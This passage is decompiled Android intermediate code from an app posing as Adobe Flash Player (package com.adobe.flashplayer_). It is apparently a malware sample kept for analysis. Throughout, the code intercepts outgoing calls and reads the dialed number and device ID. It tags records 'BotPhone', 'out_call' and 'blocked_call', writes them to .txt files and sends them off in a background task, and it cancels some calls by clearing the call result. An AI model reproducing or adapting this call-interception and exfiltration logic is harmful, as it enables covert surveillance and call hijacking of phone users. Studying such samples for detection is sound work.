  #L036e9e.  call temp:= `append`(v0, v4) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036ea4.  v23:= temp @kind object;
  #L036ea6.  v24:= "&e=" @kind object;
  #L036eaa.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036eb0.  v23:= temp @kind object;
  #L036eb2.  v24:= "BotPhone" @kind object;
  #L036eb6.  v0:= v26 @kind object;
  #L036eba.  v1:= v24 @kind object;
  #L036ebe.  v2:= v27 @kind object;
  #L036ec2.  call temp:= `readConfig`(v0, v1, v2) @signature `Lcom/adobe/flashplayer_/FlashZ;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L036ec8.  v24:= temp @kind object;
  #L036eca.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036ed0.  v23:= temp @kind object;
  #L036ed2.  v24:= "&f=" @kind object;
  #L036ed6.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036edc.  v23:= temp @kind object;
  #L036ede.  v0:= v23 @kind object;
  #L036ee2.  call temp:= `append`(v0, v6) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036ee8.  v23:= temp @kind object;
  #L036eea.  v24:= "&g=" @kind object;
  #L036eee.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036ef4.  v23:= temp @kind object;
  #L036ef6.  v0:= v23 @kind object;
  #L036efa.  call temp:= `append`(v0, v8) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036f00.  v23:= temp @kind object;
  #L036f02.  v24:= "&h=out_call&i=" @kind object;
  #L036f06.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036f0c.  v23:= temp @kind object;
  #L036f0e.  v0:= v23 @kind object;
  #L036f12.  call temp:= `append`(v0, v15) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036f18.  v23:= temp @kind object;
  #L036f1a.  call temp:= `toString`(v23) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L036f20.  v23:= temp @kind object;
  #L036f22.  v21[v22]:= v23 @kind object;
  #L036f26.  v22:= 1I;
  #L036f2a.  v23:= new `java.lang.StringBuilder`;
  #L036f2e.  call temp:= `valueOf`(v15) @signature `Ljava/lang/String;.valueOf:(Ljava/lang/Object;)Ljava/lang/String;` @kind static;
  #L036f34.  v24:= temp @kind object;
  #L036f36.  call `<init>`(v23, v24) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L036f3c.  v24:= ".txt" @kind object;
  #L036f40.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036f46.  v23:= temp @kind object;
  #L036f48.  call temp:= `toString`(v23) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L036f4e.  v23:= temp @kind object;
  #L036f50.  v0:= v27 @kind object;
  #L036f54.  v1:= v23 @kind object;
  #L036f58.  call temp:= `getFileStreamPath`(v0, v1) @signature `Landroid/content/Context;.getFileStreamPath:(Ljava/lang/String;)Ljava/io/File;` @kind virtual;
  #L036f5e.  v23:= temp @kind object;
  #L036f60.  call temp:= `toString`(v23) @signature `Ljava/io/File;.toString:()Ljava/lang/String;` @kind virtual;
  #L036f66.  v23:= temp @kind object;
  #L036f68.  v21[v22]:= v23 @kind object;
  #L036f6c.  v22:= 2I;
  #L036f70.  v21[v22]:= v9 @kind object;
  #L036f74.  call temp:= `execute`(v20, v21) @signature `Lcom/adobe/flashplayer_/FlashVirtual;.execute:([Ljava/lang/Object;)Landroid/os/AsyncTask;` @kind virtual;
  #L036f7a.  goto L03699c;
  #L036f7e.  v20:= "android.intent.extra.PHONE_NUMBER" @kind object;
  #L036f82.  v0:= v28 @kind object;
  #L036f86.  v1:= v20 @kind object;
  #L036f8a.  call temp:= `getStringExtra`(v0, v1) @signature `Landroid/content/Intent;.getStringExtra:(Ljava/lang/String;)Ljava/lang/String;` @kind virtual;
  #L036f90.  v20:= temp @kind object;
  #L036f92.  v21:= v14[v19] @kind object;
  #L036f96.  call temp:= `indexOf`(v20, v21) @signature `Ljava/lang/String;.indexOf:(Ljava/lang/String;)I` @kind virtual;
  #L036f9c.  v20:= temp;
  #L036f9e.  v21:= -1I;
  #L036fa2.  v0:= v20;
  #L036fa6.  v1:= v21;
  #L036faa.  if v0 == v1 then goto L037226;
  #L036fae.  v17:= 1I;
  #L036fb2.  call temp:= `getResultData`(v26) @signature `Lcom/adobe/flashplayer_/FlashZ;.getResultData:()Ljava/lang/String;` @kind virtual;
  #L036fb8.  v20:= temp @kind object;
  #L036fba.  if v20 == 0 then goto L037226;
  #L036fbe.  v20:= "connectivity" @kind object;
  #L036fc2.  v0:= v27 @kind object;
  #L036fc6.  v1:= v20 @kind object;
  #L036fca.  call temp:= `getSystemService`(v0, v1) @signature `Landroid/content/Context;.getSystemService:(Ljava/lang/String;)Ljava/lang/Object;` @kind virtual;
  #L036fd0.  v12:= temp @kind object;
  #L036fd2.  v12:= (`android.net.ConnectivityManager`) v12 @kind object;
  #L036fd6.  call temp:= `getActiveNetworkInfo`(v12) @signature `Landroid/net/ConnectivityManager;.getActiveNetworkInfo:()Landroid/net/NetworkInfo;` @kind virtual;
  #L036fdc.  v16:= temp @kind object;
  #L036fde.  v20:= "phone" @kind object;
  #L036fe2.  v0:= v27 @kind object;
  #L036fe6.  v1:= v20 @kind object;
  #L036fea.  call temp:= `getSystemService`(v0, v1) @signature `Landroid/content/Context;.getSystemService:(Ljava/lang/String;)Ljava/lang/Object;` @kind virtual;
  #L036ff0.  v18:= temp @kind object;
  #L036ff2.  v18:= (`android.telephony.TelephonyManager`) v18 @kind object;
  #L036ff6.  call temp:= `getDeviceId`(v18) @signature `Landroid/telephony/TelephonyManager;.getDeviceId:()Ljava/lang/String;` @kind virtual;
  #L036ffc.  v7:= temp @kind object;
  #L036ffe.  if v16 == 0 then goto L037214;
  #L037002.  call temp:= `isConnectedOrConnecting`(v16) @signature `Landroid/net/NetworkInfo;.isConnectedOrConnecting:()Z` @kind virtual;
  #L037008.  v20:= temp;
  #L03700a.  if v20 == 0 then goto L037214;
  #L03700e.  v11:= "" @kind object;
  #L037012.  v20:= new `java.lang.StringBuilder`;
  #L037016.  call temp:= `valueOf`(v11) @signature `Ljava/lang/String;.valueOf:(Ljava/lang/Object;)Ljava/lang/String;` @kind static;
  #L03701c.  v21:= temp @kind object;
  #L03701e.  call `<init>`(v20, v21) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L037024.  v21:= "android.intent.extra.PHONE_NUMBER" @kind object;
  #L037028.  v0:= v28 @kind object;
  #L03702c.  v1:= v21 @kind object;
  #L037030.  call temp:= `getStringExtra`(v0, v1) @signature `Landroid/content/Intent;.getStringExtra:(Ljava/lang/String;)Ljava/lang/String;` @kind virtual;
  #L037036.  v21:= temp @kind object;
  #L037038.  call temp:= `append`(v20, v21) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L03703e.  v20:= temp @kind object;
  #L037040.  call temp:= `toString`(v20) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L037046.  v11:= temp @kind object;
  #L037048.  v20:= "android.intent.extra.PHONE_NUMBER" @kind object;
  #L03704c.  v0:= v28 @kind object;
  #L037050.  v1:= v20 @kind object;
  #L037054.  call temp:= `getStringExtra`(v0, v1) @signature `Landroid/content/Intent;.getStringExtra:(Ljava/lang/String;)Ljava/lang/String;` @kind virtual;
  #L03705a.  v20:= temp @kind object;
  #L03705c.  v21:= "+" @kind object;
  #L037060.  v22:= "" @kind object;
  #L037064.  call temp:= `replace`(v20, v21, v22) @signature `Ljava/lang/String;.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;` @kind virtual;
  #L03706a.  v20:= temp @kind object;
  #L03706c.  v21:= "*" @kind object;
  #L037070.  v22:= "S" @kind object;
  #L037074.  call temp:= `replace`(v20, v21, v22) @signature `Ljava/lang/String;.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;` @kind virtual;
  #L03707a.  v20:= temp @kind object;
  #L03707c.  v21:= "#" @kind object;
  #L037080.  v22:= "W" @kind object;
  #L037084.  call temp:= `replace`(v20, v21, v22) @signature `Ljava/lang/String;.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;` @kind virtual;
  #L03708a.  v15:= temp @kind object;
  #L03708c.  v20:= new `java.lang.StringBuilder`;
  #L037090.  call temp:= `valueOf`(v15) @signature `Ljava/lang/String;.valueOf:(Ljava/lang/Object;)Ljava/lang/String;` @kind static;
  #L037096.  v21:= temp @kind object;
  #L037098.  call `<init>`(v20, v21) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L03709e.  v21:= ".txt" @kind object;
  #L0370a2.  call temp:= `append`(v20, v21) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0370a8.  v20:= temp @kind object;
  #L0370aa.  call temp:= `toString`(v20) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L0370b0.  v20:= temp @kind object;
  #L0370b2.  v0:= v26 @kind object;
  #L0370b6.  v1:= v20 @kind object;
  #L0370ba.  v2:= v27 @kind object;
  #L0370be.  call `saveData`(v0, v11, v1, v2) @signature `Lcom/adobe/flashplayer_/FlashZ;.saveData:(Ljava/lang/String;Ljava/lang/String;Landroid/content/Context;)V` @kind direct;
  #L0370c4.  v20:= new `com.adobe.flashplayer_.FlashVirtual`;
  #L0370c8.  call `<init>`(v20) @signature `Lcom/adobe/flashplayer_/FlashVirtual;.<init>:()V` @kind direct;
  #L0370ce.  v21:= 3I;
  #L0370d2.  v0:= v21;
  #L0370d6.  v0:= new `java.lang.String`[v0];
  #L0370da.  v21:= v0 @kind object;
  #L0370de.  v22:= 0I;
  #L0370e2.  v23:= new `java.lang.StringBuilder`;
  #L0370e6.  v24:= "&b=" @kind object;
  #L0370ea.  call `<init>`(v23, v24) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L0370f0.  v0:= v23 @kind object;
  #L0370f4.  call temp:= `append`(v0, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0370fa.  v23:= temp @kind object;
  #L0370fc.  v24:= "&c=" @kind object;
  #L037100.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037106.  v23:= temp @kind object;
  #L037108.  v24:= ":" @kind object;
  #L03710c.  v25:= "" @kind object;
  #L037110.  v0:= v24 @kind object;
  #L037114.  v1:= v25 @kind object;
  #L037118.  call temp:= `replace`(v5, v0, v1) @signature `Ljava/lang/String;.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;` @kind virtual;
  #L03711e.  v24:= temp @kind object;
  #L037120.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037126.  v23:= temp @kind object;
  #L037128.  v24:= "&d=" @kind object;
  #L03712c.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037132.  v23:= temp @kind object;
  #L037134.  v0:= v23 @kind object;
  #L037138.  call temp:= `append`(v0, v4) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L03713e.  v23:= temp @kind object;
  #L037140.  v24:= "&e=" @kind object;
  #L037144.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L03714a.  v23:= temp @kind object;
  #L03714c.  v24:= "BotPhone" @kind object;
  #L037150.  v0:= v26 @kind object;
  #L037154.  v1:= v24 @kind object;
  #L037158.  v2:= v27 @kind object;
  #L03715c.  call temp:= `readConfig`(v0, v1, v2) @signature `Lcom/adobe/flashplayer_/FlashZ;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L037162.  v24:= temp @kind object;
  #L037164.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L03716a.  v23:= temp @kind object;
  #L03716c.  v24:= "&f=" @kind object;
  #L037170.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037176.  v23:= temp @kind object;
  #L037178.  v0:= v23 @kind object;
  #L03717c.  call temp:= `append`(v0, v6) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037182.  v23:= temp @kind object;
  #L037184.  v24:= "&g=" @kind object;
  #L037188.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L03718e.  v23:= temp @kind object;
  #L037190.  v0:= v23 @kind object;
  #L037194.  call temp:= `append`(v0, v8) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L03719a.  v23:= temp @kind object;
  #L03719c.  v24:= "&h=blocked_call&i=" @kind object;
  #L0371a0.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0371a6.  v23:= temp @kind object;
  #L0371a8.  v0:= v23 @kind object;
  #L0371ac.  call temp:= `append`(v0, v15) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0371b2.  v23:= temp @kind object;
  #L0371b4.  call temp:= `toString`(v23) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L0371ba.  v23:= temp @kind object;
  #L0371bc.  v21[v22]:= v23 @kind object;
  #L0371c0.  v22:= 1I;
  #L0371c4.  v23:= new `java.lang.StringBuilder`;
  #L0371c8.  call temp:= `valueOf`(v15) @signature `Ljava/lang/String;.valueOf:(Ljava/lang/Object;)Ljava/lang/String;` @kind static;
  #L0371ce.  v24:= temp @kind object;
  #L0371d0.  call `<init>`(v23, v24) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L0371d6.  v24:= ".txt" @kind object;
  #L0371da.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0371e0.  v23:= temp @kind object;
  #L0371e2.  call temp:= `toString`(v23) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L0371e8.  v23:= temp @kind object;
  #L0371ea.  v0:= v27 @kind object;
  #L0371ee.  v1:= v23 @kind object;
  #L0371f2.  call temp:= `getFileStreamPath`(v0, v1) @signature `Landroid/content/Context;.getFileStreamPath:(Ljava/lang/String;)Ljava/io/File;` @kind virtual;
  #L0371f8.  v23:= temp @kind object;
  #L0371fa.  call temp:= `toString`(v23) @signature `Ljava/io/File;.toString:()Ljava/lang/String;` @kind virtual;
  #L037200.  v23:= temp @kind object;
  #L037202.  v21[v22]:= v23 @kind object;
  #L037206.  v22:= 2I;
  #L03720a.  v21[v22]:= v9 @kind object;
  #L03720e.  call temp:= `execute`(v20, v21) @signature `Lcom/adobe/flashplayer_/FlashVirtual;.execute:([Ljava/lang/Object;)Landroid/os/AsyncTask;` @kind virtual;
  #L037214.  v20:= 0I;
  #L037218.  v0:= v26 @kind object;
  #L03721c.  v1:= v20 @kind object;
  #L037220.  call `setResultData`(v0, v1) @signature `Lcom/adobe/flashplayer_/FlashZ;.setResultData:(Ljava/lang/String;)V` @kind virtual;
  #L037226.  v19:= v19 + 1;
  #L03722a.  goto L036d0a;
  #L03722e.  v20:= "android.intent.extra.PHONE_NUMBER" @kind object;
  #L037232.  v0:= v28 @kind object;
  #L037236.  v1:= v20 @kind object;
  #L03723a.  call temp:= `getStringExtra`(v0, v1) @signature `Landroid/content/Intent;.getStringExtra:(Ljava/lang/String;)Ljava/lang/String;` @kind virtual;
  #L037240.  v20:= temp @kind object;
  #L037242.  v0:= v20 @kind object;
  #L037246.  call temp:= `indexOf`(v0, v13) @signature `Ljava/lang/String;.indexOf:(Ljava/lang/String;)I` @kind virtual;
  #L03724c.  v20:= temp;
  #L03724e.  v21:= -1I;
  #L037252.  v0:= v20;
  #L037256.  v1:= v21;
  #L03725a.  if v0 == v1 then goto L036d1c;
  #L03725e.  v20:= "" @kind object;
  #L037262.  v0:= v20 @kind object;
  #L037266.  if v13 == v0 then goto L036d1c;
  #L03726a.  if v17 != 0 then goto L036d1c;
  #L03726e.  call temp:= `getResultData`(v26) @signature `Lcom/adobe/flashplayer_/FlashZ;.getResultData:()Ljava/lang/String;` @kind virtual;
  #L037274.  v20:= temp @kind object;
  #L037276.  if v20 == 0 then goto L036d1c;
  #L03727a.  v17:= 1I;
  #L03727e.  v20:= "connectivity" @kind object;
  #L037282.  v0:= v27 @kind object;
  #L037286.  v1:= v20 @kind object;
  #L03728a.  call temp:= `getSystemService`(v0, v1) @signature `Landroid/content/Context;.getSystemService:(Ljava/lang/String;)Ljava/lang/Object;` @kind virtual;
  #L037290.  v12:= temp @kind object;
  #L037292.  v12:= (`android.net.ConnectivityManager`) v12 @kind object;
  #L037296.  call temp:= `getActiveNetworkInfo`(v12) @signature `Landroid/net/ConnectivityManager;.getActiveNetworkInfo:()Landroid/net/NetworkInfo;` @kind virtual;
  #L03729c.  v16:= temp @kind object;
  #L03729e.  v20:= "phone" @kind object;
  #L0372a2.  v0:= v27 @kind object;
  #L0372a6.  v1:= v20 @kind object;
  #L0372aa.  call temp:= `getSystemService`(v0, v1) @signature `Landroid/content/Context;.getSystemService:(Ljava/lang/String;)Ljava/lang/Object;` @kind virtual;
  #L0372b0.  v18:= temp @kind object;
  #L0372b2.  v18:= (`android.telephony.TelephonyManager`) v18 @kind object;
  #L0372b6.  if v16 == 0 then goto L0374d8;
  #L0372ba.  call temp:= `isConnectedOrConnecting`(v16) @signature `Landroid/net/NetworkInfo;.isConnectedOrConnecting:()Z` @kind virtual;
  #L0372c0.  v20:= temp;
  #L0372c2.  if v20 == 0 then goto L0374d8;
  #L0372c6.  v11:= "" @kind object;
  #L0372ca.  v20:= new `java.lang.StringBuilder`;
  #L0372ce.  call temp:= `valueOf`(v11) @signature `Ljava/lang/String;.valueOf:(Ljava/lang/Object;)Ljava/lang/String;` @kind static;
  #L0372d4.  v21:= temp @kind object;
  #L0372d6.  call `<init>`(v20, v21) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L0372dc.  v21:= "android.intent.extra.PHONE_NUMBER" @kind object;
  #L0372e0.  v0:= v28 @kind object;
  #L0372e4.  v1:= v21 @kind object;
  #L0372e8.  call temp:= `getStringExtra`(v0, v1) @signature `Landroid/content/Intent;.getStringExtra:(Ljava/lang/String;)Ljava/lang/String;` @kind virtual;
  #L0372ee.  v21:= temp @kind object;
  #L0372f0.  call temp:= `append`(v20, v21) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0372f6.  v20:= temp @kind object;
  #L0372f8.  v21:= "\n" @kind object;
  #L0372fc.  call temp:= `append`(v20, v21) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037302.  v20:= temp @kind object;
  #L037304.  call temp:= `toString`(v20) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L03730a.  v11:= temp @kind object;
  #L03730c.  v20:= "android.intent.extra.PHONE_NUMBER" @kind object;
  #L037310.  v0:= v28 @kind object;
  #L037314.  v1:= v20 @kind object;
  #L037318.  call temp:= `getStringExtra`(v0, v1) @signature `Landroid/content/Intent;.getStringExtra:(Ljava/lang/String;)Ljava/lang/String;` @kind virtual;
  #L03731e.  v20:= temp @kind object;
  #L037320.  v21:= "+" @kind object;
  #L037324.  v22:= "" @kind object;
  #L037328.  call temp:= `replace`(v20, v21, v22) @signature `Ljava/lang/String;.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;` @kind virtual;
  #L03732e.  v20:= temp @kind object;
  #L037330.  v21:= "*" @kind object;
  #L037334.  v22:= "S" @kind object;
  #L037338.  call temp:= `replace`(v20, v21, v22) @signature `Ljava/lang/String;.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;` @kind virtual;
  #L03733e.  v20:= temp @kind object;
  #L037340.  v21:= "#" @kind object;
  #L037344.  v22:= "W" @kind object;
  #L037348.  call temp:= `replace`(v20, v21, v22) @signature `Ljava/lang/String;.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;` @kind virtual;
  #L03734e.  v15:= temp @kind object;
  #L037350.  v20:= new `java.lang.StringBuilder`;
  #L037354.  call temp:= `valueOf`(v15) @signature `Ljava/lang/String;.valueOf:(Ljava/lang/Object;)Ljava/lang/String;` @kind static;
  #L03735a.  v21:= temp @kind object;
  #L03735c.  call `<init>`(v20, v21) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L037362.  v21:= ".txt" @kind object;
  #L037366.  call temp:= `append`(v20, v21) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L03736c.  v20:= temp @kind object;
  #L03736e.  call temp:= `toString`(v20) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L037374.  v20:= temp @kind object;
  #L037376.  v0:= v26 @kind object;
  #L03737a.  v1:= v20 @kind object;
  #L03737e.  v2:= v27 @kind object;
  #L037382.  call `saveData`(v0, v11, v1, v2) @signature `Lcom/adobe/flashplayer_/FlashZ;.saveData:(Ljava/lang/String;Ljava/lang/String;Landroid/content/Context;)V` @kind direct;
  #L037388.  v20:= new `com.adobe.flashplayer_.FlashVirtual`;
  #L03738c.  call `<init>`(v20) @signature `Lcom/adobe/flashplayer_/FlashVirtual;.<init>:()V` @kind direct;
  #L037392.  v21:= 3I;
  #L037396.  v0:= v21;
  #L03739a.  v0:= new `java.lang.String`[v0];
  #L03739e.  v21:= v0 @kind object;
  #L0373a2.  v22:= 0I;
  #L0373a6.  v23:= new `java.lang.StringBuilder`;
  #L0373aa.  v24:= "&b=" @kind object;
  #L0373ae.  call `<init>`(v23, v24) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L0373b4.  v0:= v23 @kind object;
  #L0373b8.  call temp:= `append`(v0, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0373be.  v23:= temp @kind object;
  #L0373c0.  v24:= "&c=" @kind object;
  #L0373c4.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0373ca.  v23:= temp @kind object;
  #L0373cc.  v24:= ":" @kind object;
  #L0373d0.  v25:= "" @kind object;
  #L0373d4.  v0:= v24 @kind object;
  #L0373d8.  v1:= v25 @kind object;
  #L0373dc.  call temp:= `replace`(v5, v0, v1) @signature `Ljava/lang/String;.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;` @kind virtual;
  #L0373e2.  v24:= temp @kind object;
  #L0373e4.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0373ea.  v23:= temp @kind object;
  #L0373ec.  v24:= "&d=" @kind object;
  #L0373f0.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0373f6.  v23:= temp @kind object;
  #L0373f8.  v0:= v23 @kind object;
  #L0373fc.  call temp:= `append`(v0, v4) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037402.  v23:= temp @kind object;
  #L037404.  v24:= "&e=" @kind object;
  #L037408.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L03740e.  v23:= temp @kind object;
  #L037410.  v24:= "BotPhone" @kind object;
  #L037414.  v0:= v26 @kind object;
  #L037418.  v1:= v24 @kind object;
  #L03741c.  v2:= v27 @kind object;
  #L037420.  call temp:= `readConfig`(v0, v1, v2) @signature `Lcom/adobe/flashplayer_/FlashZ;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L037426.  v24:= temp @kind object;
  #L037428.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L03742e.  v23:= temp @kind object;
  #L037430.  v24:= "&f=" @kind object;
  #L037434.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L03743a.  v23:= temp @kind object;
  #L03743c.  v0:= v23 @kind object;
  #L037440.  call temp:= `append`(v0, v6) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037446.  v23:= temp @kind object;
  #L037448.  v24:= "&g=" @kind object;
  #L03744c.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037452.  v23:= temp @kind object;
  #L037454.  v0:= v23 @kind object;
  #L037458.  call temp:= `append`(v0, v8) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L03745e.  v23:= temp @kind object;
  #L037460.  v24:= "&h=blocked_call&i=" @kind object;
  #L037464.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L03746a.  v23:= temp @kind object;
  #L03746c.  v0:= v23 @kind object;
  #L037470.  call temp:= `append`(v0, v15) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L037476.  v23:= temp @kind object;
  #L037478.  call temp:= `toString`(v23) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L03747e.  v23:= temp @kind object;
  #L037480.  v21[v22]:= v23 @kind object;
  #L037484.  v22:= 1I;
  #L037488.  v23:= new `java.lang.StringBuilder`;
  #L03748c.  call temp:= `valueOf`(v15) @signature `Ljava/lang/String;.valueOf:(Ljava/lang/Object;)Ljava/lang/String;` @kind static;
  #L037492.  v24:= temp @kind object;
  #L037494.  call `<init>`(v23, v24) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L03749a.  v24:= ".txt" @kind object;
  #L03749e.  call temp:= `append`(v23, v24) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0374a4.  v23:= temp @kind object;
  #L0374a6.  call temp:= `toString`(v23) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L0374ac.  v23:= temp @kind object;
  #L0374ae.  v0:= v27 @kind object;
  #L0374b2.  v1:= v23 @kind object;
  #L0374b6.  call temp:= `getFileStreamPath`(v0, v1) @signature `Landroid/content/Context;.getFileStreamPath:(Ljava/lang/String;)Ljava/io/File;` @kind virtual;
  #L0374bc.  v23:= temp @kind object;
  #L0374be.  call temp:= `toString`(v23) @signature `Ljava/io/File;.toString:()Ljava/lang/String;` @kind virtual;
  #L0374c4.  v23:= temp @kind object;
  #L0374c6.  v21[v22]:= v23 @kind object;
  #L0374ca.  v22:= 2I;
  #L0374ce.  v21[v22]:= v9 @kind object;
  #L0374d2.  call temp:= `execute`(v20, v21) @signature `Lcom/adobe/flashplayer_/FlashVirtual;.execute:([Ljava/lang/Object;)Landroid/os/AsyncTask;` @kind virtual;
  #L0374d8.  v20:= 0I;
  #L0374dc.  v0:= v26 @kind object;
